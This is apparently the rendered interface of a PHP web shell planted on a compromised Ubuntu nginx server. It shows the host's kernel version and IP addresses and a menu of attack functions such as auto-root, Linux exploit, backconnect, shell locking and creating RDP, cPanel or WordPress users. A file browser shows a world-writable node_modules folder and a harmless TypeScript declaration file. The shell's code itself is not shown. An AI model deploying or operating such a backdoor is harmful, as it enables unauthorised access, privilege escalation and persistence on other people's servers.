Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
jiti /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
plugins
[ DIR ]
dr-xr-xr-x
babel.d.ts
139
B
-rw-rw-rw-
babel.js
1.61
MB
-rw-rw-rw-
jiti.d.ts
950
B
-rw-rw-rw-
jiti.js
244.54
KB
-rw-rw-rw-
types.d.ts
913
B
-rw-rw-rw-
utils.d.ts
505
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jiti.d.ts
/// <reference types="node" /> /// <reference types="node" /> import { Module } from "module"; import { TransformOptions, JITIOptions, JITIImportOptions } from "./types"; export type { JITIOptions, TransformOptions } from "./types"; type Require = typeof require; type Module = typeof module; type ModuleCache = Record<string, Module>; export type EvalModuleOptions = Partial<{ id: string; filename: string; ext: string; cache: ModuleCache; }>; export interface JITI extends Require { transform: (opts: TransformOptions) => string; register: () => () => void; evalModule: (source: string, options?: EvalModuleOptions) => unknown; /** @experimental Behavior of `jiti.import` might change in the future. */ import: (id: string, importOptions: JITIImportOptions) => Promise<unknown>; } export default function createJITI(_filename: string, opts?: JITIOptions, parentModule?: Module, parentCache?: ModuleCache): JITI;
Close